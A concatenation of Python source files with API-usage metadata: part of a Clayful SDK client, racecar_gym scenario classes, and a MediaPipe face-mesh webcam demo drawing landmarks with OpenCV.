'uses_form_data': options.get('uses_form_data', False),
'error': None,
'response': None,
})
default_headers = Clayful.default_headers.copy()
# Extend default headers with header options
default_headers.update(extracted['headers'])
extracted['headers'] = default_headers
Clayful.trigger('request', extracted)
try:
response = Clayful.plugins['request'](extracted)
extracted['response'] = response
Clayful.trigger('response', extracted)
return response
except ClayfulException as e:
extracted['error'] = e
Clayful.trigger('response', extracted)
raise
@staticmethod
def config(options = {}):
headers = Clayful.options_to_headers(options)
Clayful.default_headers.update(headers)
@staticmethod
def install(scope, plugin):
if scope in Clayful.plugins:
Clayful.plugins[scope] = plugin
@staticmethod
def on(event_name, callback):
listeners = Clayful.listeners.get(event_name, None)
if listeners is None:
return
listeners.append(callback)
@staticmethod
def off(event_name, callback):
listeners = Clayful.listeners.get(event_name, None)
if (listeners is None) or (not callback in listeners):
return
listeners.remove(callback)
@staticmethod
def trigger(event_name, data):
listeners = Clayful.listeners.get(event_name, None)
if listeners is None:
return
for listener in listeners:
listener(data)
@staticmethod
def format_image_url(base_url, options = {}):
query = []
normalized = Clayful.normalize_query_values(options)
for key in normalized:
query.append(key + '=' + normalized.get(key, ''))
query = '&'.join(query)
if bool(query):
query = '?' + query
return base_url + query
@staticmethod
def format_number(number, currency = {}):
if not isinstance(number, numbers.Number):
return ''
precision = currency.get('precision', None)
delimiter = currency.get('delimiter', {})
thousands = delimiter.get('thousands', '')
decimal = delimiter.get('decimal', '.')
if isinstance(precision, numbers.Number):
n = 10 ** precision
number = round(number * n) / n
# To deal with 0.0 case..
if precision == 0:
number = int(number)
parts = str(number).split('.')
a = thousands.join(re.findall('.{1,3}', parts[0][::-1]))[::-1]
b = parts[1] if len(parts) > 1 else ''
if isinstance(precision, numbers.Number):
diff = precision - len(b)
diff = 0 if diff < 0 else diff
b += '0' * diff
decimal = decimal if bool(b) else ''
return decimal.join([a, b])
@staticmethod
def format_price(number, currency = {}):
formatted_number = Clayful.format_number(number, currency)
if not bool(formatted_number):
return ''
symbol = currency.get('symbol', '')
format = currency.get('format', '{price}')
return format.replace('{symbol}', symbol).replace('{price}', formatted_number)
# Register models
register_models(Clayful) | [
"re.findall",
"clayful.models.register_models"
] | [((5574, 5598), 'clayful.models.register_models', 'register_models', (['Clayful'], {}), '(Clayful)\n', (5589, 5598), False, 'from clayful.models import register_models\n'), ((4934, 4970), 're.findall', 're.findall', (['""".{1,3}"""', 'parts[0][::-1]'], {}), "('.{1,3}', parts[0][::-1])\n", (4944, 4970), False, 'import re\n')] |
from dataclasses import dataclass
from typing import Dict
from racecar_gym.bullet import load_world, load_vehicle
from racecar_gym.tasks import Task, get_task
from racecar_gym.core import World, Agent
from .specs import ScenarioSpec, TaskSpec
def task_from_spec(spec: TaskSpec) -> Task:
task = get_task(spec.task_name)
return task(**spec.params)
@dataclass
class MultiAgentScenario:
world: World
agents: Dict[str, Agent]
@staticmethod
def from_spec(path: str, rendering: bool = None) -> 'MultiAgentScenario':
spec = ScenarioSpec()
spec.load(path)
if rendering:
spec.world.rendering = rendering
agents = dict([
(s.id, Agent(id=s.id, vehicle=load_vehicle(s.vehicle), task=task_from_spec(s.task)))
for s in spec.agents
])
return MultiAgentScenario(world=load_world(spec.world, agents=list(agents.values())), agents=agents)
@dataclass
class SingleAgentScenario:
world: World
agent: Agent
@staticmethod
def from_spec(path: str, rendering: bool = None) -> 'SingleAgentScenario':
spec = ScenarioSpec()
spec.load(path)
if rendering:
spec.world.rendering = rendering
agent_spec = spec.agents[0]
agent = Agent(id=agent_spec.id, vehicle=load_vehicle(agent_spec.vehicle), task=task_from_spec(agent_spec.task))
return SingleAgentScenario(world=load_world(spec.world, agents=[agent]), agent=agent)
| [
"racecar_gym.tasks.get_task",
"racecar_gym.bullet.load_world",
"racecar_gym.bullet.load_vehicle"
] | [((300, 324), 'racecar_gym.tasks.get_task', 'get_task', (['spec.task_name'], {}), '(spec.task_name)\n', (308, 324), False, 'from racecar_gym.tasks import Task, get_task\n'), ((1311, 1343), 'racecar_gym.bullet.load_vehicle', 'load_vehicle', (['agent_spec.vehicle'], {}), '(agent_spec.vehicle)\n', (1323, 1343), False, 'from racecar_gym.bullet import load_world, load_vehicle\n'), ((1425, 1463), 'racecar_gym.bullet.load_world', 'load_world', (['spec.world'], {'agents': '[agent]'}), '(spec.world, agents=[agent])\n', (1435, 1463), False, 'from racecar_gym.bullet import load_world, load_vehicle\n'), ((725, 748), 'racecar_gym.bullet.load_vehicle', 'load_vehicle', (['s.vehicle'], {}), '(s.vehicle)\n', (737, 748), False, 'from racecar_gym.bullet import load_world, load_vehicle\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import copy
import argparse
import cv2 as cv
import numpy as np
import mediapipe as mp
from utils import CvFpsCalc
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("--device", type=int, default=0)
parser.add_argument("--width", help='cap width', type=int, default=960)
parser.add_argument("--height", help='cap height', type=int, default=540)
parser.add_argument("--max_num_faces", type=int, default=1)
parser.add_argument("--min_detection_confidence",
help='min_detection_confidence',
type=float,
default=0.7)
parser.add_argument("--min_tracking_confidence",
help='min_tracking_confidence',
type=int,
default=0.5)
parser.add_argument('--use_brect', action='store_true')
args = parser.parse_args()
return args
def main():
# 引数解析 #################################################################
args = get_args()
cap_device = args.device
cap_width = args.width
cap_height = args.height
max_num_faces = args.max_num_faces
min_detection_confidence = args.min_detection_confidence
min_tracking_confidence = args.min_tracking_confidence
use_brect = args.use_brect
# カメラ準備 ###############################################################
cap = cv.VideoCapture(cap_device)
cap.set(cv.CAP_PROP_FRAME_WIDTH, cap_width)
cap.set(cv.CAP_PROP_FRAME_HEIGHT, cap_height)
# モデルロード #############################################################
mp_face_mesh = mp.solutions.face_mesh
face_mesh = mp_face_mesh.FaceMesh(
max_num_faces=max_num_faces,
min_detection_confidence=min_detection_confidence,
min_tracking_confidence=min_tracking_confidence,
)
# FPS計測モジュール ########################################################
cvFpsCalc = CvFpsCalc(buffer_len=10)
while True:
display_fps = cvFpsCalc.get()
# カメラキャプチャ #####################################################
ret, image = cap.read()
if not ret:
break
image = cv.flip(image, 1) # ミラー表示
debug_image = copy.deepcopy(image)
# 検出実施 #############################################################
image = cv.cvtColor(image, cv.COLOR_BGR2RGB)
results = face_mesh.process(image)
# 描画 ################################################################
if results.multi_face_landmarks is not None:
for face_landmarks in results.multi_face_landmarks:
# 外接矩形の計算
brect = calc_bounding_rect(debug_image, face_landmarks)
# 描画
debug_image = draw_landmarks(debug_image, face_landmarks)
debug_image = draw_bounding_rect(use_brect, debug_image, brect)
cv.putText(debug_image, "FPS:" + str(display_fps), (10, 30),
cv.FONT_HERSHEY_SIMPLEX, 1.0, (0, 255, 0), 2, cv.LINE_AA)
# キー処理(ESC:終了) #################################################
key = cv.waitKey(1)
if key == 27: # ESC
break
# 画面反映 #############################################################
cv.imshow('MediaPipe Face Mesh Demo', debug_image)
cap.release()
cv.destroyAllWindows()
def calc_bounding_rect(image, landmarks):
image_width, image_height = image.shape[1], image.shape[0]
landmark_array = np.empty((0, 2), int)
for _, landmark in enumerate(landmarks.landmark):
landmark_x = min(int(landmark.x * image_width), image_width - 1)
landmark_y = min(int(landmark.y * image_height), image_height - 1)
landmark_point = [np.array((landmark_x, landmark_y))]
landmark_array = np.append(landmark_array, landmark_point, axis=0)
x, y, w, h = cv.boundingRect(landmark_array)
return [x, y, x + w, y + h]
def draw_landmarks(image, landmarks):
image_width, image_height = image.shape[1], image.shape[0]
landmark_point = []
for index, landmark in enumerate(landmarks.landmark):
if landmark.visibility < 0 or landmark.presence < 0:
continue
landmark_x = min(int(landmark.x * image_width), image_width - 1)
landmark_y = min(int(landmark.y * image_height), image_height - 1)
landmark_point.append((landmark_x, landmark_y))
cv.circle(image, (landmark_x, landmark_y), 1, (0, 255, 0), 1)
if len(landmark_point) > 0:
# 参考:https://github.com/tensorflow/tfjs-models/blob/master/facemesh/mesh_map.jpg
# 左眉毛(55:内側、46:外側)
cv.line(image, landmark_point[55], landmark_point[65], (0, 255, 0), 2)
cv.line(image, landmark_point[65], landmark_point[52], (0, 255, 0), 2)
cv.line(image, landmark_point[52], landmark_point[53], (0, 255, 0), 2)
cv.line(image, landmark_point[53], landmark_point[46], (0, 255, 0), 2)
# 右眉毛(285:内側、276:外側)
cv.line(image, landmark_point[285], landmark_point[295], (0, 255, 0),
2)
cv.line(image, landmark_point[295], landmark_point[282], (0, 255, 0),
2)
cv.line(image, landmark_point[282], landmark_point[283], (0, 255, 0),
2)
cv.line(image, landmark_point[283], landmark_point[276], (0, 255, 0),
2)
# 左目 (133:目頭、246:目尻)
cv.line(image, landmark_point[133], landmark_point[173], (0, 255, 0),
2)
cv.line(image, landmark_point[173], landmark_point[157], (0, 255, 0),
2)
cv.line(image, landmark_point[157], landmark_point[158], (0, 255, 0),
2)
cv.line(image, landmark_point[158], landmark_point[159], (0, 255, 0),
2)
cv.line(image, landmark_point[159], landmark_point[160], (0, 255, 0),
2)
cv.line(image, landmark_point[160], landmark_point[161], (0, 255, 0),
2)
cv.line(image, landmark_point[161], landmark_point[246], (0, 255, 0),
2)
cv.line(image, landmark_point[246], landmark_point[163], (0, 255, 0),
2)
cv.line(image, landmark_point[163], landmark_point[144], (0, 255, 0),
2)
cv.line(image, landmark_point[144], landmark_point[145], (0, 255, 0),
2)
cv.line(image, landmark_point[145], landmark_point[153], (0, 255, 0),
2)
cv.line(image, landmark_point[153], landmark_point[154], (0, 255, 0),
2)
cv.line(image, landmark_point[154], landmark_point[155], (0, 255, 0),
2)
cv.line(image, landmark_point[155], landmark_point[133], (0, 255, 0),
2)
# 右目 (362:目頭、466:目尻)
cv.line(image, landmark_point[362], landmark_point[398], (0, 255, 0),
2)
cv.line(image, landmark_point[398], landmark_point[384], (0, 255, 0),
2)
cv.line(image, landmark_point[384], landmark_point[385], (0, 255, 0),
2)
cv.line(image, landmark_point[385], landmark_point[386], (0, 255, 0),
2)
cv.line(image, landmark_point[386], landmark_point[387], (0, 255, 0),
2)
cv.line(image, landmark_point[387], landmark_point[388], (0, 255, 0),
2)
cv.line(image, landmark_point[388], landmark_point[466], (0, 255, 0),
2)
cv.line(image, landmark_point[466], landmark_point[390], (0, 255, 0),
2)
cv.line(image, landmark_point[390], landmark_point[373], (0, 255, 0),
2)
cv.line(image, landmark_point[373], landmark_point[374], (0, 255, 0),
2)
cv.line(image, landmark_point[374], landmark_point[380], (0, 255, 0),
2)
cv.line(image, landmark_point[380], landmark_point[381], (0, 255, 0),
2)
cv.line(image, landmark_point[381], landmark_point[382], (0, 255, 0),
2)
cv.line(image, landmark_point[382], landmark_point[362], (0, 255, 0),
2)
# 口 (308:右端、78:左端)
cv.line(image, landmark_point[308], landmark_point[415], (0, 255, 0),
2)
cv.line(image, landmark_point[415], landmark_point[310], (0, 255, 0),
2)
cv.line(image, landmark_point[310], landmark_point[311], (0, 255, 0),
2)
cv.line(image, landmark_point[311], landmark_point[312], (0, 255, 0),
2)
cv.line(image, landmark_point[312], landmark_point[13], (0, 255, 0), 2)
cv.line(image, landmark_point[13], landmark_point[82], (0, 255, 0), 2)
cv.line(image, landmark_point[82], landmark_point[81], (0, 255, 0), 2)
cv.line(image, landmark_point[81], landmark_point[80], (0, 255, 0), 2)
cv.line(image, landmark_point[80], landmark_point[191], (0, 255, 0), 2)
cv.line(image, landmark_point[191], landmark_point[78], (0, 255, 0), 2)
cv.line(image, landmark_point[78], landmark_point[95], (0, 255, 0), 2)
cv.line(image, landmark_point[95], landmark_point[88], (0, 255, 0), 2)
cv.line(image, landmark_point[88], landmark_point[178], (0, 255, 0), 2)
cv.line(image, landmark_point[178], landmark_point[87], (0, 255, 0), 2)
cv.line(image, landmark_point[87], landmark_point[14], (0, 255, 0), 2)
cv.line(image, landmark_point[14], landmark_point[317], (0, 255, 0), 2)
cv.line(image, landmark_point[317], landmark_point[402], (0, 255, 0),
2)
cv.line(image, landmark_point[402], landmark_point[318], (0, 255, 0),
2)
cv.line(image, landmark_point[318], landmark_point[324], (0, 255, 0),
2)
cv.line(image, landmark_point[324], landmark_point[308], (0, 255, 0),
2)
return image
def draw_bounding_rect(use_brect, image, brect):
if use_brect:
# 外接矩形
cv.rectangle(image, (brect[0], brect[1]), (brect[2], brect[3]),
(0, 255, 0), 2)
return image
if __name__ == '__main__':
main()
| [
"cv2.rectangle",
"cv2.flip",
"argparse.ArgumentParser",
"cv2.boundingRect",
"cv2.line",
"cv2.imshow",
"numpy.append",
"numpy.array",
"cv2.circle",
"numpy.empty",
"cv2.destroyAllWindows",
"cv2.VideoCapture",
"copy.deepcopy",
"cv2.cvtColor",
"cv2.waitKey",
"utils.CvFpsCalc"
] | [((194, 219), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (217, 219), False, 'import argparse\n'), ((1449, 1476), 'cv2.VideoCapture', 'cv.VideoCapture', (['cap_device'], {}), '(cap_device)\n', (1464, 1476), True, 'import cv2 as cv\n'), ((1982, 2006), 'utils.CvFpsCalc', 'CvFpsCalc', ([], {'buffer_len': '(10)'}), '(buffer_len=10)\n', (1991, 2006), False, 'from utils import CvFpsCalc\n'), ((3391, 3413), 'cv2.destroyAllWindows', 'cv.destroyAllWindows', ([], {}), '()\n', (3411, 3413), True, 'import cv2 as cv\n'), ((3543, 3564), 'numpy.empty', 'np.empty', (['(0, 2)', 'int'], {}), '((0, 2), int)\n', (3551, 3564), True, 'import numpy as np\n'), ((3925, 3956), 'cv2.boundingRect', 'cv.boundingRect', (['landmark_array'], {}), '(landmark_array)\n', (3940, 3956), True, 'import cv2 as cv\n'), ((2222, 2239), 'cv2.flip', 'cv.flip', (['image', '(1)'], {}), '(image, 1)\n', (2229, 2239), True, 'import cv2 as cv\n'), ((2271, 2291), 'copy.deepcopy', 'copy.deepcopy', (['image'], {}), '(image)\n', (2284, 2291), False, 'import copy\n'), ((2386, 2422), 'cv2.cvtColor', 'cv.cvtColor', (['image', 'cv.COLOR_BGR2RGB'], {}), '(image, cv.COLOR_BGR2RGB)\n', (2397, 2422), True, 'import cv2 as cv\n'), ((3170, 3183), 'cv2.waitKey', 'cv.waitKey', (['(1)'], {}), '(1)\n', (3180, 3183), True, 'import cv2 as cv\n'), ((3317, 3367), 'cv2.imshow', 'cv.imshow', (['"""MediaPipe Face Mesh Demo"""', 'debug_image'], {}), "('MediaPipe Face Mesh Demo', debug_image)\n", (3326, 3367), True, 'import cv2 as cv\n'), ((3857, 3906), 'numpy.append', 'np.append', (['landmark_array', 'landmark_point'], {'axis': '(0)'}), '(landmark_array, landmark_point, axis=0)\n', (3866, 3906), True, 'import numpy as np\n'), ((4474, 4535), 'cv2.circle', 'cv.circle', (['image', '(landmark_x, landmark_y)', '(1)', '(0, 255, 0)', '(1)'], {}), '(image, (landmark_x, landmark_y), 1, (0, 255, 0), 1)\n', (4483, 4535), True, 'import cv2 as cv\n'), ((4694, 4764), 'cv2.line', 'cv.line', (['image', 'landmark_point[55]', 
'landmark_point[65]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[55], landmark_point[65], (0, 255, 0), 2)\n', (4701, 4764), True, 'import cv2 as cv\n'), ((4773, 4843), 'cv2.line', 'cv.line', (['image', 'landmark_point[65]', 'landmark_point[52]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[65], landmark_point[52], (0, 255, 0), 2)\n', (4780, 4843), True, 'import cv2 as cv\n'), ((4852, 4922), 'cv2.line', 'cv.line', (['image', 'landmark_point[52]', 'landmark_point[53]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[52], landmark_point[53], (0, 255, 0), 2)\n', (4859, 4922), True, 'import cv2 as cv\n'), ((4931, 5001), 'cv2.line', 'cv.line', (['image', 'landmark_point[53]', 'landmark_point[46]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[53], landmark_point[46], (0, 255, 0), 2)\n', (4938, 5001), True, 'import cv2 as cv\n'), ((5040, 5112), 'cv2.line', 'cv.line', (['image', 'landmark_point[285]', 'landmark_point[295]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[285], landmark_point[295], (0, 255, 0), 2)\n', (5047, 5112), True, 'import cv2 as cv\n'), ((5137, 5209), 'cv2.line', 'cv.line', (['image', 'landmark_point[295]', 'landmark_point[282]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[295], landmark_point[282], (0, 255, 0), 2)\n', (5144, 5209), True, 'import cv2 as cv\n'), ((5234, 5306), 'cv2.line', 'cv.line', (['image', 'landmark_point[282]', 'landmark_point[283]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[282], landmark_point[283], (0, 255, 0), 2)\n', (5241, 5306), True, 'import cv2 as cv\n'), ((5331, 5403), 'cv2.line', 'cv.line', (['image', 'landmark_point[283]', 'landmark_point[276]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[283], landmark_point[276], (0, 255, 0), 2)\n', (5338, 5403), True, 'import cv2 as cv\n'), ((5458, 5530), 'cv2.line', 'cv.line', (['image', 'landmark_point[133]', 'landmark_point[173]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[133], landmark_point[173], (0, 255, 0), 
2)\n', (5465, 5530), True, 'import cv2 as cv\n'), ((5555, 5627), 'cv2.line', 'cv.line', (['image', 'landmark_point[173]', 'landmark_point[157]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[173], landmark_point[157], (0, 255, 0), 2)\n', (5562, 5627), True, 'import cv2 as cv\n'), ((5652, 5724), 'cv2.line', 'cv.line', (['image', 'landmark_point[157]', 'landmark_point[158]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[157], landmark_point[158], (0, 255, 0), 2)\n', (5659, 5724), True, 'import cv2 as cv\n'), ((5749, 5821), 'cv2.line', 'cv.line', (['image', 'landmark_point[158]', 'landmark_point[159]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[158], landmark_point[159], (0, 255, 0), 2)\n', (5756, 5821), True, 'import cv2 as cv\n'), ((5846, 5918), 'cv2.line', 'cv.line', (['image', 'landmark_point[159]', 'landmark_point[160]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[159], landmark_point[160], (0, 255, 0), 2)\n', (5853, 5918), True, 'import cv2 as cv\n'), ((5943, 6015), 'cv2.line', 'cv.line', (['image', 'landmark_point[160]', 'landmark_point[161]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[160], landmark_point[161], (0, 255, 0), 2)\n', (5950, 6015), True, 'import cv2 as cv\n'), ((6040, 6112), 'cv2.line', 'cv.line', (['image', 'landmark_point[161]', 'landmark_point[246]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[161], landmark_point[246], (0, 255, 0), 2)\n', (6047, 6112), True, 'import cv2 as cv\n'), ((6138, 6210), 'cv2.line', 'cv.line', (['image', 'landmark_point[246]', 'landmark_point[163]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[246], landmark_point[163], (0, 255, 0), 2)\n', (6145, 6210), True, 'import cv2 as cv\n'), ((6235, 6307), 'cv2.line', 'cv.line', (['image', 'landmark_point[163]', 'landmark_point[144]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[163], landmark_point[144], (0, 255, 0), 2)\n', (6242, 6307), True, 'import cv2 as cv\n'), ((6332, 6404), 'cv2.line', 'cv.line', (['image', 
'landmark_point[144]', 'landmark_point[145]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[144], landmark_point[145], (0, 255, 0), 2)\n', (6339, 6404), True, 'import cv2 as cv\n'), ((6429, 6501), 'cv2.line', 'cv.line', (['image', 'landmark_point[145]', 'landmark_point[153]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[145], landmark_point[153], (0, 255, 0), 2)\n', (6436, 6501), True, 'import cv2 as cv\n'), ((6526, 6598), 'cv2.line', 'cv.line', (['image', 'landmark_point[153]', 'landmark_point[154]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[153], landmark_point[154], (0, 255, 0), 2)\n', (6533, 6598), True, 'import cv2 as cv\n'), ((6623, 6695), 'cv2.line', 'cv.line', (['image', 'landmark_point[154]', 'landmark_point[155]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[154], landmark_point[155], (0, 255, 0), 2)\n', (6630, 6695), True, 'import cv2 as cv\n'), ((6720, 6792), 'cv2.line', 'cv.line', (['image', 'landmark_point[155]', 'landmark_point[133]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[155], landmark_point[133], (0, 255, 0), 2)\n', (6727, 6792), True, 'import cv2 as cv\n'), ((6847, 6919), 'cv2.line', 'cv.line', (['image', 'landmark_point[362]', 'landmark_point[398]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[362], landmark_point[398], (0, 255, 0), 2)\n', (6854, 6919), True, 'import cv2 as cv\n'), ((6944, 7016), 'cv2.line', 'cv.line', (['image', 'landmark_point[398]', 'landmark_point[384]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[398], landmark_point[384], (0, 255, 0), 2)\n', (6951, 7016), True, 'import cv2 as cv\n'), ((7041, 7113), 'cv2.line', 'cv.line', (['image', 'landmark_point[384]', 'landmark_point[385]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[384], landmark_point[385], (0, 255, 0), 2)\n', (7048, 7113), True, 'import cv2 as cv\n'), ((7138, 7210), 'cv2.line', 'cv.line', (['image', 'landmark_point[385]', 'landmark_point[386]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[385], 
landmark_point[386], (0, 255, 0), 2)\n', (7145, 7210), True, 'import cv2 as cv\n'), ((7235, 7307), 'cv2.line', 'cv.line', (['image', 'landmark_point[386]', 'landmark_point[387]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[386], landmark_point[387], (0, 255, 0), 2)\n', (7242, 7307), True, 'import cv2 as cv\n'), ((7332, 7404), 'cv2.line', 'cv.line', (['image', 'landmark_point[387]', 'landmark_point[388]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[387], landmark_point[388], (0, 255, 0), 2)\n', (7339, 7404), True, 'import cv2 as cv\n'), ((7429, 7501), 'cv2.line', 'cv.line', (['image', 'landmark_point[388]', 'landmark_point[466]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[388], landmark_point[466], (0, 255, 0), 2)\n', (7436, 7501), True, 'import cv2 as cv\n'), ((7527, 7599), 'cv2.line', 'cv.line', (['image', 'landmark_point[466]', 'landmark_point[390]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[466], landmark_point[390], (0, 255, 0), 2)\n', (7534, 7599), True, 'import cv2 as cv\n'), ((7624, 7696), 'cv2.line', 'cv.line', (['image', 'landmark_point[390]', 'landmark_point[373]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[390], landmark_point[373], (0, 255, 0), 2)\n', (7631, 7696), True, 'import cv2 as cv\n'), ((7721, 7793), 'cv2.line', 'cv.line', (['image', 'landmark_point[373]', 'landmark_point[374]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[373], landmark_point[374], (0, 255, 0), 2)\n', (7728, 7793), True, 'import cv2 as cv\n'), ((7818, 7890), 'cv2.line', 'cv.line', (['image', 'landmark_point[374]', 'landmark_point[380]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[374], landmark_point[380], (0, 255, 0), 2)\n', (7825, 7890), True, 'import cv2 as cv\n'), ((7915, 7987), 'cv2.line', 'cv.line', (['image', 'landmark_point[380]', 'landmark_point[381]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[380], landmark_point[381], (0, 255, 0), 2)\n', (7922, 7987), True, 'import cv2 as cv\n'), ((8012, 8084), 
'cv2.line', 'cv.line', (['image', 'landmark_point[381]', 'landmark_point[382]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[381], landmark_point[382], (0, 255, 0), 2)\n', (8019, 8084), True, 'import cv2 as cv\n'), ((8109, 8181), 'cv2.line', 'cv.line', (['image', 'landmark_point[382]', 'landmark_point[362]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[382], landmark_point[362], (0, 255, 0), 2)\n', (8116, 8181), True, 'import cv2 as cv\n'), ((8234, 8306), 'cv2.line', 'cv.line', (['image', 'landmark_point[308]', 'landmark_point[415]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[308], landmark_point[415], (0, 255, 0), 2)\n', (8241, 8306), True, 'import cv2 as cv\n'), ((8331, 8403), 'cv2.line', 'cv.line', (['image', 'landmark_point[415]', 'landmark_point[310]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[415], landmark_point[310], (0, 255, 0), 2)\n', (8338, 8403), True, 'import cv2 as cv\n'), ((8428, 8500), 'cv2.line', 'cv.line', (['image', 'landmark_point[310]', 'landmark_point[311]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[310], landmark_point[311], (0, 255, 0), 2)\n', (8435, 8500), True, 'import cv2 as cv\n'), ((8525, 8597), 'cv2.line', 'cv.line', (['image', 'landmark_point[311]', 'landmark_point[312]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[311], landmark_point[312], (0, 255, 0), 2)\n', (8532, 8597), True, 'import cv2 as cv\n'), ((8622, 8693), 'cv2.line', 'cv.line', (['image', 'landmark_point[312]', 'landmark_point[13]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[312], landmark_point[13], (0, 255, 0), 2)\n', (8629, 8693), True, 'import cv2 as cv\n'), ((8702, 8772), 'cv2.line', 'cv.line', (['image', 'landmark_point[13]', 'landmark_point[82]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[13], landmark_point[82], (0, 255, 0), 2)\n', (8709, 8772), True, 'import cv2 as cv\n'), ((8781, 8851), 'cv2.line', 'cv.line', (['image', 'landmark_point[82]', 'landmark_point[81]', '(0, 255, 0)', '(2)'], {}), 
'(image, landmark_point[82], landmark_point[81], (0, 255, 0), 2)\n', (8788, 8851), True, 'import cv2 as cv\n'), ((8860, 8930), 'cv2.line', 'cv.line', (['image', 'landmark_point[81]', 'landmark_point[80]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[81], landmark_point[80], (0, 255, 0), 2)\n', (8867, 8930), True, 'import cv2 as cv\n'), ((8939, 9010), 'cv2.line', 'cv.line', (['image', 'landmark_point[80]', 'landmark_point[191]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[80], landmark_point[191], (0, 255, 0), 2)\n', (8946, 9010), True, 'import cv2 as cv\n'), ((9019, 9090), 'cv2.line', 'cv.line', (['image', 'landmark_point[191]', 'landmark_point[78]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[191], landmark_point[78], (0, 255, 0), 2)\n', (9026, 9090), True, 'import cv2 as cv\n'), ((9100, 9170), 'cv2.line', 'cv.line', (['image', 'landmark_point[78]', 'landmark_point[95]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[78], landmark_point[95], (0, 255, 0), 2)\n', (9107, 9170), True, 'import cv2 as cv\n'), ((9179, 9249), 'cv2.line', 'cv.line', (['image', 'landmark_point[95]', 'landmark_point[88]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[95], landmark_point[88], (0, 255, 0), 2)\n', (9186, 9249), True, 'import cv2 as cv\n'), ((9258, 9329), 'cv2.line', 'cv.line', (['image', 'landmark_point[88]', 'landmark_point[178]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[88], landmark_point[178], (0, 255, 0), 2)\n', (9265, 9329), True, 'import cv2 as cv\n'), ((9338, 9409), 'cv2.line', 'cv.line', (['image', 'landmark_point[178]', 'landmark_point[87]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[178], landmark_point[87], (0, 255, 0), 2)\n', (9345, 9409), True, 'import cv2 as cv\n'), ((9418, 9488), 'cv2.line', 'cv.line', (['image', 'landmark_point[87]', 'landmark_point[14]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[87], landmark_point[14], (0, 255, 0), 2)\n', (9425, 9488), True, 'import cv2 as cv\n'), ((9497, 9568), 
'cv2.line', 'cv.line', (['image', 'landmark_point[14]', 'landmark_point[317]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[14], landmark_point[317], (0, 255, 0), 2)\n', (9504, 9568), True, 'import cv2 as cv\n'), ((9577, 9649), 'cv2.line', 'cv.line', (['image', 'landmark_point[317]', 'landmark_point[402]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[317], landmark_point[402], (0, 255, 0), 2)\n', (9584, 9649), True, 'import cv2 as cv\n'), ((9674, 9746), 'cv2.line', 'cv.line', (['image', 'landmark_point[402]', 'landmark_point[318]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[402], landmark_point[318], (0, 255, 0), 2)\n', (9681, 9746), True, 'import cv2 as cv\n'), ((9771, 9843), 'cv2.line', 'cv.line', (['image', 'landmark_point[318]', 'landmark_point[324]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[318], landmark_point[324], (0, 255, 0), 2)\n', (9778, 9843), True, 'import cv2 as cv\n'), ((9868, 9940), 'cv2.line', 'cv.line', (['image', 'landmark_point[324]', 'landmark_point[308]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[324], landmark_point[308], (0, 255, 0), 2)\n', (9875, 9940), True, 'import cv2 as cv\n'), ((10067, 10146), 'cv2.rectangle', 'cv.rectangle', (['image', '(brect[0], brect[1])', '(brect[2], brect[3])', '(0, 255, 0)', '(2)'], {}), '(image, (brect[0], brect[1]), (brect[2], brect[3]), (0, 255, 0), 2)\n', (10079, 10146), True, 'import cv2 as cv\n'), ((3795, 3829), 'numpy.array', 'np.array', (['(landmark_x, landmark_y)'], {}), '((landmark_x, landmark_y))\n', (3803, 3829), True, 'import numpy as np\n')] |
"""Vista del inventario del modulo de prestamos tecnologicos."""
